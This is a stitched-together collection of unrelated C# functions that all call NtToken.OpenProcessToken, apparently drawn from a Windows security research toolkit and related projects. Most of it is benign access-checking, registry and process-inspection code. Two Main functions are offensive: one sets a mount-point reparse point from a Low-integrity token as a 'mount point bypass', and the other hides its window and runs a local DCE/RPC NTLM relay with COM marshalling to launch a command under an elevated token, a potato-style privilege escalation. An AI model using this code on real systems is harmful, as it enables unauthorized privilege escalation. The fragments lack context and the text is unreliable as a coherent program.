public ObjectManagerPSDriveInfo(NtObject root, PSDriveInfo drive_info)
: base(drive_info)
{
if (root is NtDirectory dir)
{
DirectoryRoot = new NtDirectoryContainer(dir);
}
else if (root is NtKey key)
{
bool open_for_backup = false;
using (var token = NtToken.OpenProcessToken())
{
if (token.SinglePrivilegeCheck(TokenPrivilegeValue.SeBackupPrivilege))
{
open_for_backup = true;
}
}
DirectoryRoot = new NtKeyContainer(key, open_for_backup);
}
else
{
throw new ArgumentException($"Invalid root object. {root.NtTypeName}");
}
}
private static Dictionary <string, string> CreateWin32BaseKeys()
{
Dictionary <string, string> dict = new Dictionary <string, string>(StringComparer.OrdinalIgnoreCase)
{
{ "HKLM", @"\Registry\Machine" },
{ "HKEY_LOCAL_MACHINE", @"\Registry\Machine" },
{ "HKU", @"\Registry\User" },
{ "HKEY_USERS", @"\Registry\User" },
{ "HKEY_CURRENT_CONFIG", @"\Registry\Machine\System\CurrentControlSet\Hardware Profiles\Current" },
{ "HKCC", @"\Registry\Machine\System\CurrentControlSet\Hardware Profiles\Current" },
};
using (var token = NtToken.OpenProcessToken(NtProcess.Current, TokenAccessRights.Query, false))
{
if (token.IsSuccess)
{
string current_user = $@"\Registry\User\{token.Result.User.Sid}";
dict.Add("HKCU", current_user);
dict.Add("HKEY_CURRENT_USER", current_user);
dict.Add(@"HKCU\Software\Classes", $"{current_user}_Classes");
dict.Add(@"HKEY_CURRENT_USER\Software\Classes", $"{current_user}_Classes");
}
}
dict.Add("HKEY_CLASSES_ROOT", @"\Registry\Machine\Software\Classes");
dict.Add("HKCR", @"\Registry\Machine\Software\Classes");
return(dict);
}
private static NtToken GetTokenFromProcessWithImpersonation(NtProcess process)
{
if (_system_token.Value != null)
{
using (_system_token.Value.Impersonate())
{
using (var token = NtToken.OpenProcessToken(process,
TokenAccessRights.Duplicate |
TokenAccessRights.Impersonate |
TokenAccessRights.Query, false))
{
if (!token.IsSuccess)
{
if (token.Status != NtStatus.STATUS_ACCESS_DENIED)
{
token.Status.ToNtException();
}
}
return(token.Result.Duplicate());
}
}
}
return(GetTokenFromProcessDuplication(process));
}
private void RefreshServiceList()
{
ClearList(listViewServices);
foreach (var service in ServiceUtils.GetRunningServicesWithProcessIds())
{
using (var result = NtToken.OpenProcessToken(service.ProcessId, false, TokenAccessRights.MaximumAllowed | TokenAccessRights.Query, false))
{
if (!result.IsSuccess)
{
continue;
}
var token = result.Result;
ListViewItem item = new ListViewItem(service.Name);
item.SubItems.Add(token.User.ToString());
item.SubItems.Add(service.LaunchProtected.ToString());
item.SubItems.Add(service.SidType.ToString());
item.SubItems.Add(service.DisplayName);
item.SubItems.Add(service.ProcessId.ToString());
item.Tag = new ServiceTokenEntry(service, token);
listViewServices.Items.Add(item);
}
}
ResizeColumns(listViewServices);
}
public void UpdateProcessList(ProcessAccessRights desired_access, bool require_token)
{
NtToken.EnableDebugPrivilege();
ClearListView();
using (var ps = NtProcess.GetProcesses(ProcessAccessRights.QueryLimitedInformation | desired_access, true).ToDisposableList())
{
foreach (var p in ps.OrderBy(p => p.ProcessId))
{
using (var result = NtToken.OpenProcessToken(p, TokenAccessRights.MaximumAllowed, false))
{
if (!result.IsSuccess && require_token)
{
continue;
}
ListViewItem item = listViewProcesses.Items.Add(p.ProcessId.ToString());
item.SubItems.Add(p.Name);
if (result.IsSuccess)
{
NtToken token = result.Result;
item.SubItems.Add(p.User.Name);
item.SubItems.Add(token.IntegrityLevel.ToString());
}
item.Tag = _processes.AddResource(p.Duplicate());
}
}
}
listViewProcesses.AutoResizeColumns(ColumnHeaderAutoResizeStyle.ColumnContent);
listViewProcesses.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
listViewProcesses.ListViewItemSorter = new ListItemComparer(0);
}
private NtToken GetEffectiveToken(TokenAccessRights desired_access)
{
if (Pseduo)
{
return(NtToken.PseudoEffectiveToken);
}
NtToken token = GetImpersonationToken(desired_access);
if (token != null)
{
return(token);
}
if (Thread == null && !ThreadId.HasValue)
{
return(NtToken.OpenProcessToken(NtProcess.Current, false, desired_access));
}
int pid;
if (Thread != null)
{
pid = Thread.ProcessId;
}
else
{
using (NtThread thread = NtThread.Open(ThreadId.Value, ThreadAccessRights.QueryLimitedInformation))
{
pid = thread.ProcessId;
}
}
return(NtToken.OpenProcessToken(pid, false, desired_access));
}
private NtToken OpenImpersonationToken()
{
using (NtToken token = NtToken.OpenProcessToken())
{
return(token.DuplicateToken(SecurityImpersonationLevel.Identification));
}
}
private static void AddTokenEntryFromProcess(HashSet <TokenEntry> tokens, NtProcess process)
{
using (var token = NtToken.OpenProcessToken(process, false, TokenAccessRights.Query))
{
using (var imp_token = token.DuplicateToken(TokenType.Impersonation, SecurityImpersonationLevel.Impersonation,
TokenAccessRights.Query | TokenAccessRights.Impersonate | TokenAccessRights.Duplicate, false))
{
NtToken valid_imp_token = null;
if (!imp_token.IsSuccess)
{
if (!_has_impersonate_privilege.Value || imp_token.Status != NtStatus.STATUS_ACCESS_DENIED)
{
imp_token.Status.ToNtException();
}
valid_imp_token = GetTokenFromProcessWithImpersonation(process);
}
else
{
valid_imp_token = imp_token.Result;
}
AddTokenEntry(tokens, new TokenEntry(token, valid_imp_token, process));
}
}
}
static void Main(string[] args)
{
bool show_help = false;
bool recursive = false;
HashSet <string> exclude_dirs = new HashSet <string>(StringComparer.OrdinalIgnoreCase);
int pid = Process.GetCurrentProcess().Id;
try
{
OptionSet opts = new OptionSet()
{
{ "r", "Recursive tree directory listing",
v => recursive = v != null },
{ "sddl", "Print full SDDL security descriptors", v => _print_sddl = v != null },
{ "p|pid=", "Specify a PID of a process to impersonate when checking", v => pid = int.Parse(v.Trim()) },
{ "w", "Show only write permissions granted", v => _show_write_only = v != null },
{ "k=", String.Format("Filter on a specific directory right [{0}]",
String.Join(",", Enum.GetNames(typeof(DirectoryAccessRights)))), v => _dir_rights |= ParseRight(v, typeof(DirectoryAccessRights)) },
{ "x=", "Specify a base path to exclude from recursive search", v => exclude_dirs.Add(v) },
{ "t=", "Specify a type of object to include", v => _type_filter.Add(v) },
{ "g", "Map access mask to generic rights.", v => _map_to_generic = v != null },
{ "e", "Display errors when opening objects, ignores access denied.", v => _show_errors = v != null },
{ "h|help", "show this message and exit", v => show_help = v != null },
};
List <string> paths = opts.Parse(args);
if (show_help || (paths.Count == 0))
{
ShowHelp(opts);
}
else
{
using (NtToken token = NtToken.OpenProcessToken(pid))
{
foreach (string path in paths)
{
try
{
using (NtDirectory dir = OpenDirectory(path))
{
HashSet <string> walked = new HashSet <string>(exclude_dirs, StringComparer.OrdinalIgnoreCase);
Console.WriteLine("Dumping Directory: {0}", path);
DumpDirectory(dir, token, recursive, walked);
}
}
catch (NtException ex)
{
Console.WriteLine("Couldn't open {0} - {1}", path, ex.Message);
}
}
}
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
static void Main(string[] args)
{
try
{
string dir = CreateDir();
Console.WriteLine("Created {0} to test mount point bypass", dir);
using (var token = NtToken.OpenProcessToken())
{
Console.WriteLine("Lowering token to Low IL");
token.SetIntegrityLevel(TokenIntegrityLevel.Low);
}
using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(dir), null,
FileAccessRights.GenericRead | FileAccessRights.GenericWrite,
FileShareMode.None, FileOpenOptions.OpenReparsePoint | FileOpenOptions.DirectoryFile))
{
Console.WriteLine("Opened {0}", file.FullPath);
byte[] buffer = BuildReparseBuffer(Environment.GetFolderPath(Environment.SpecialFolder.Windows));
file.FsControl(NtWellKnownIoControlCodes.FSCTL_SET_REPARSE_POINT_EX, buffer, 0);
MountPointReparseBuffer rp = (MountPointReparseBuffer)file.GetReparsePoint();
Console.WriteLine("Set Mount Point: {0} {1}", rp.Tag, rp.SubstitutionName);
Console.ReadLine();
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
Console.ReadLine();
}
}
/// <summary>
/// Get the maximum permission access for this object based on the current token
/// and its security descriptor.
/// </summary>
/// <returns>Returns 0 if can't read the security descriptor.</returns>
public A GetMaximumAccess()
{
using (NtToken token = NtToken.OpenProcessToken())
{
return(GetMaximumAccess(token));
}
}
static void SetVirtualization(bool enable)
{
using (var token = NtToken.OpenProcessToken())
{
token.VirtualizationEnabled = enable;
}
}
/// <summary>
/// Method to create an object from a set of object attributes.
/// </summary>
/// <param name="obj_attributes">The object attributes to create/open from.</param>
/// <returns>The newly created object.</returns>
protected override object CreateObject(ObjectAttributes obj_attributes)
{
string key_path = Win32Path ? NtKeyUtils.Win32KeyNameToNt(KeyPath) : KeyPath;
using (ObjectAttributes name = new ObjectAttributes(key_path, AttributeFlags.CaseInsensitive))
{
if ((LoadFlags & LoadKeyFlags.AppKey) == 0)
{
using (NtToken token = NtToken.OpenProcessToken())
{
TokenPrivilege priv = token.GetPrivilege(TokenPrivilegeValue.SeRestorePrivilege);
if (priv == null || (priv.Attributes & PrivilegeAttributes.Enabled) == 0)
{
WriteWarning("Loading a non-app hive should require SeRestorePrivilege");
}
}
}
else
{
if (!KeyPath.StartsWith(@"\Registry\A\", System.StringComparison.OrdinalIgnoreCase))
{
WriteWarning(@"Loading app hive outside of \Registry\A\ will fail on an up to date system.");
}
}
return(NtKey.LoadKey(name, obj_attributes, LoadFlags, Access));
}
}
static bool IsInAppContainer()
{
using (var token = NtToken.OpenProcessToken())
{
return(token.AppContainer);
}
}
static void EnablePrivileges()
{
using (var token = NtToken.OpenProcessToken())
{
token.SetPrivilege(TokenPrivilegeValue.SeBackupPrivilege, PrivilegeAttributes.Enabled);
token.SetPrivilege(TokenPrivilegeValue.SeRestorePrivilege, PrivilegeAttributes.Enabled);
}
}
static int Main(string[] args)
{
IntPtr handle = GetConsoleWindow();
// Hide
ShowWindow(handle, SW_HIDE);
InvokePrivs.EnablePriv("SeImpersonatePrivilege");
if (args.LongLength > 0)
{
string cmd = args[0]; //= Shell.GetCommand(Process.GetCurrentProcess().MainModule.FileName);
}
else
{
Environment.Exit(-1);
}
DCERPCNtlmHandler dcerpcServer = new DCERPCNtlmHandler();
Thread bootstrapThread = null;
Thread dcerpcThread = null;
dcerpcThread = new Thread(() => dcerpcServer.start("127.0.0.1", "6666", "127.0.0.1", "135", false, "true", cmd));
dcerpcThread.Start();
Thread.Sleep(100);
try
{
bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal());
bootstrapThread.Start();
}
catch (Exception e)
{
Console.WriteLine("This wasn't supposed to happen... {0}", e);
}
if (dcerpcThread != null)
{
DCERPCNtlmHandler.finished.WaitOne();
if (!Shell.NtShell)
{
NtToken main_token = NtToken.OpenProcessToken();
//TokenUtils.CreateProcessForToken("powershell.exe -EncodedCommand " + cmd, main_token, false);
TokenUtils.CreateProcessForToken(cmd, main_token, false);
}
Thread.Sleep(100);
Environment.Exit(0);
dcerpcThread.Abort();
bootstrapThread.Abort();
}
Environment.Exit(0);
return(0);
}
private protected override void RunAccessCheck(IEnumerable <TokenEntry> tokens)
{
if (!NtToken.EnableDebugPrivilege())
{
WriteWarning("Current process doesn't have SeDebugPrivilege, results may be inaccurate");
}
NtType type = NtType.GetTypeByType <NtToken>();
AccessMask access_rights = type.MapGenericRights(AccessRights);
int current_session_id = NtProcess.Current.SessionId;
using (var procs = NtProcess.GetProcesses(ProcessAccessRights.QueryInformation | ProcessAccessRights.ReadControl, false).ToDisposableList())
{
IEnumerable <NtProcess> proc_enum = procs;
if (CurrentSession)
{
proc_enum = proc_enum.Where(p => CheckSession(p, current_session_id));
}
foreach (var proc in proc_enum.Where(p => ShowDeadProcesses || !p.IsDeleting))
{
using (var result = NtToken.OpenProcessToken(proc, TokenAccessRights.ReadControl | TokenAccessRights.Query, false))
{
if (!result.IsSuccess)
{
WriteWarning($"Couldn't open token for Process {proc.Name} PID: {proc.ProcessId} Status: {result.Status}");
continue;
}
NtToken primary_token = result.Result;
var sd_result = primary_token.GetSecurityDescriptor(SecurityInformation.AllBasic, false);
if (!sd_result.IsSuccess)
{
WriteWarning($"Couldn't get token's Security Descriptor for Process {proc.Name} PID: {proc.ProcessId} Status: {sd_result.Status}");
continue;
}
var sd = sd_result.Result;
string process_name = proc.Name;
string process_cmdline = proc.CommandLine;
string image_path = proc.FullPath;
int process_id = proc.ProcessId;
foreach (var token in tokens)
{
if (proc.GetMaximumAccess(token.Token).HasFlag(ProcessAccessRights.QueryLimitedInformation))
{
AccessMask granted_access = NtSecurity.GetMaximumAccess(sd, token.Token, type.GenericMapping);
if (IsAccessGranted(granted_access, access_rights))
{
WriteObject(new TokenAccessCheckResult(primary_token, proc,
granted_access, sd, token.Information));
}
}
}
}
}
}
}
private static NtToken FetchDesktopToken()
{
var shell = GetShellWindow();
_ = GetWindowThreadProcessId(shell, out var shellProcessId);
using var proc = NtProcess.Open(shellProcessId, ProcessAccessRights.MaximumAllowed, true).GetResultOrThrow();
using var token = NtToken.OpenProcessToken(proc);
return(token.DuplicateToken(TokenType.Primary, SecurityImpersonationLevel.Impersonation, TokenAccessRights.MaximumAllowed));
}
private NtToken GetPrimaryToken(TokenAccessRights desired_access)
{
if (ProcessId.HasValue)
{
return(NtToken.OpenProcessToken(ProcessId.Value, false, desired_access));
}
return(NtToken.OpenProcessToken(Process ?? NtProcess.Current, false, desired_access));
}
static void Main(string[] args)
{
bool show_help = false;
int pid = Process.GetCurrentProcess().Id;
try
{
PrintDeprecationWarning();
OptionSet opts = new OptionSet()
{
{ "r", "Recursive tree directory listing",
v => _recursive = v != null },
{ "sddl", "Print full SDDL security descriptors", v => _print_sddl = v != null },
{ "p|pid=", "Specify a PID of a process to impersonate when checking", v => pid = int.Parse(v.Trim()) },
{ "w", "Show only write permissions granted", v => _show_write_only = v != null },
{ "k=", String.Format("Filter on a specific right [{0}]",
String.Join(",", Enum.GetNames(typeof(KeyAccessRights)))), v => _key_rights |= ParseRight(v, typeof(KeyAccessRights)) },
{ "x=", "Specify a base path to exclude from recursive search", v => _walked.Add(v.ToLower()) },
{ "g", "Map access mask to generic rights.", v => _map_to_generic = v != null },
{ "h|help", "show this message and exit", v => show_help = v != null },
};
List <string> paths = opts.Parse(args);
if (show_help || (paths.Count == 0))
{
ShowHelp(opts);
}
else
{
using (NtToken token = NtToken.OpenProcessToken(pid))
{
foreach (string path in paths)
{
try
{
using (NtKey key = OpenKey(path))
{
DumpKey(token, key);
}
}
catch (NtException ex)
{
Console.Error.WriteLine("Error opening key: {0} - {1}", path, ex.Message);
}
}
}
}
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
}
}
private static void AddTokenEntryFromProcess(HashSet <TokenEntry> tokens, NtProcess process)
{
using (NtToken token = NtToken.OpenProcessToken(process, false,
TokenAccessRights.Duplicate |
TokenAccessRights.Impersonate |
TokenAccessRights.Query))
{
AddTokenEntry(tokens, new TokenEntry(token, process));
}
}
internal NtProcessMitigations(NtProcess process)
{
ProcessDepStatus dep_status = process.DepStatus;
DisableAtlThunkEmulation = dep_status.DisableAtlThunkEmulation;
DepEnabled = dep_status.Enabled;
DepPermanent = dep_status.Permanent;
int result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessASLRPolicy);
EnableBottomUpRandomization = result.GetBit(0);
EnableForceRelocateImages = result.GetBit(1);
EnableHighEntropy = result.GetBit(2);
DisallowStrippedImages = result.GetBit(3);
DisallowWin32kSystemCalls = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessSystemCallDisablePolicy).GetBit(0);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessStrictHandleCheckPolicy);
RaiseExceptionOnInvalidHandleReference = result.GetBit(0);
HandleExceptionsPermanentlyEnabled = result.GetBit(1);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessFontDisablePolicy);
DisableNonSystemFonts = result.GetBit(0);
AuditNonSystemFontLoading = result.GetBit(1);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessDynamicCodePolicy);
ProhibitDynamicCode = result.GetBit(0);
AllowThreadOptOut = result.GetBit(1);
AllowRemoteDowngrade = result.GetBit(2);
DisableExtensionPoints = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessExtensionPointDisablePolicy).GetBit(0);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessSignaturePolicy);
MicrosoftSignedOnly = result.GetBit(0);
StoreSignedOnly = result.GetBit(1);
SignedMitigationOptIn = result.GetBit(2);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessImageLoadPolicy);
NoRemoteImages = result.GetBit(0);
NoLowMandatoryLabelImages = result.GetBit(1);
PreferSystem32Images = result.GetBit(2);
result = process.GetProcessMitigationPolicy(ProcessMitigationPolicy.ProcessReturnFlowGuardPolicy);
EnabledReturnFlowGuard = result.GetBit(0);
ReturnFlowGuardStrictMode = result.GetBit(1);
IsChildProcessRestricted = process.IsChildProcessRestricted;
using (var token = NtToken.OpenProcessToken(process, TokenAccessRights.Query, false))
{
IsRestricted = token.Result.Restricted;
IsAppContainer = token.Result.AppContainer;
IsLowPrivilegeAppContainer = token.Result.LowPrivilegeAppContainer;
IntegrityLevel = token.Result.IntegrityLevel;
}
ProcessId = process.ProcessId;
Name = process.Name;
ImagePath = process.FullPath;
CommandLine = process.CommandLine;
}
static void Main(string[] args)
{
bool show_help = false;
int pid = Process.GetCurrentProcess().Id;
try
{
OptionSet opts = new OptionSet()
{
{ "r", "Recursive tree directory listing",
v => _recursive = v != null },
{ "sddl", "Print full SDDL security descriptors", v => _print_sddl = v != null },
{ "p|pid=", "Specify a PID of a process to impersonate when checking", v => pid = int.Parse(v.Trim()) },
{ "w", "Show only write permissions granted", v => _show_write_only = v != null },
{ "f=", String.Format("Filter on a file right [{0}]",
String.Join(",", Enum.GetNames(typeof(FileAccessRights)))), v => _file_filter |= ParseRight(v, typeof(FileAccessRights)) },
{ "d=", String.Format("Filter on a directory right [{0}]",
String.Join(",", Enum.GetNames(typeof(FileDirectoryAccessRights)))), v => _dir_filter |= ParseRight(v, typeof(FileDirectoryAccessRights)) },
{ "x=", "Specify a base path to exclude from recursive search", v => _walked.Add(v) },
{ "q", "Don't print errors", v => _quiet = v != null },
{ "onlydirs", "Only check the permissions of directories", v => _only_dirs = v != null },
{ "h|help", "show this message and exit", v => show_help = v != null },
};
List <string> paths = opts.Parse(args);
if (show_help || (paths.Count == 0))
{
ShowHelp(opts);
}
else
{
_type = NtType.GetTypeByName("file");
_token = NtToken.OpenProcessToken(pid);
foreach (string path in paths)
{
if ((File.GetAttributes(path) & System.IO.FileAttributes.Directory) == System.IO.FileAttributes.Directory)
{
DumpDirectory(new DirectoryInfo(path));
}
else
{
DumpFile(new FileInfo(path));
}
}
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
private void btnCurrentProcess_Click(object sender, EventArgs e)
{
try
{
TokenForm.OpenForm(NtToken.OpenProcessToken(), false);
}
catch (NtException ex)
{
MessageBox.Show(this, ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
private protected bool HasSecurityPrivilege()
{
if (!_has_security_privilege.HasValue)
{
using (var token = NtToken.OpenProcessToken())
{
_has_security_privilege = token.GetPrivilege(TokenPrivilegeValue.SeSecurityPrivilege)?.Enabled ?? false;
}
}
return(_has_security_privilege.Value);
}
private static NtToken GetProcessToken(NtThread thread)
{
try
{
return(NtToken.OpenProcessToken(thread.ProcessId));
}
catch (NtException)
{
return(null);
}
}
static void Main(string[] args)
{
bool show_help = false;
int pid = Process.GetCurrentProcess().Id;
int recursive_depth = 1;
bool no_files = false;
try
{
PrintDeprecationWarning();
OptionSet opts = new OptionSet()
{
{ "r", "Recursive tree directory listing",
v => recursive_depth = v != null ? int.MaxValue : 1 },
{ "sddl", "Print full SDDL security descriptors", v => _print_sddl = v != null },
{ "p|pid=", "Specify a PID of a process to impersonate when checking", v => pid = int.Parse(v.Trim()) },
{ "w", "Show only write permissions granted", v => _show_write_only = v != null },
{ "f=", String.Format("Filter on a file right [{0}]",
String.Join(",", Enum.GetNames(typeof(FileAccessRights)))), v => _file_filter |= ParseRight(v, typeof(FileAccessRights)) },
{ "d=", String.Format("Filter on a directory right [{0}]",
String.Join(",", Enum.GetNames(typeof(FileDirectoryAccessRights)))), v => _dir_filter |= ParseRight(v, typeof(FileDirectoryAccessRights)) },
{ "x=", "Specify a base path to exclude from recursive search", v => _walked.Add(ConvertPath(v)) },
{ "q", "Don't print errors", v => _quiet = v != null },
{ "g", "Map access mask to generic rights.", v => _map_to_generic = v != null },
{ "nofiles", "Don't show permission of files.", v => no_files = v != null },
{ "depth", "Specify a recursive depth", v => recursive_depth = int.Parse(v) },
{ "h|help", "show this message and exit", v => show_help = v != null },
};
List <string> paths = opts.Parse(args).Select(p => ConvertPath(p)).ToList();
if (show_help || (paths.Count == 0))
{
ShowHelp(opts);
}
else
{
_type = NtType.GetTypeByType <NtFile>();
_token = NtToken.OpenProcessToken(pid);
foreach (string path in paths)
{
DumpFile(path, null, recursive_depth, no_files);
}
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
private NtToken GetServiceNameToken(TokenAccessRights desired_access)
{
int pid = ServiceUtils.GetServiceProcessId(ServiceName);
if (pid == 0)
{
throw new ArgumentException($"{ServiceName} is not current running.");
}
using (var process = NtProcess.Open(pid, ProcessAccessRights.QueryLimitedInformation))
{
return(NtToken.OpenProcessToken(process, false, desired_access));
}
}
private NtToken GetSandboxedToken(TokenAccessRights desired_access, Func <NtToken, NtToken> sandbox_func)
{
using (NtToken token = Token != null ? Token.Duplicate() : NtToken.OpenProcessToken())
{
using (NtToken sandbox_token = sandbox_func(token))
{
if (desired_access == TokenAccessRights.MaximumAllowed)
{
return(token.Duplicate());
}
return(token.Duplicate(desired_access));
}
}
}
/// <summary>
/// Override for begin processing.
/// </summary>
protected override void BeginProcessing()
{
using (NtToken process_token = NtToken.OpenProcessToken())
{
_open_for_backup = process_token.SetPrivilege(TokenPrivilegeValue.SeBackupPrivilege, PrivilegeAttributes.Enabled);
if (!_open_for_backup)
{
WriteWarning("Current process doesn't have SeBackupPrivilege, results may be inaccurate");
}
}
base.BeginProcessing();
}
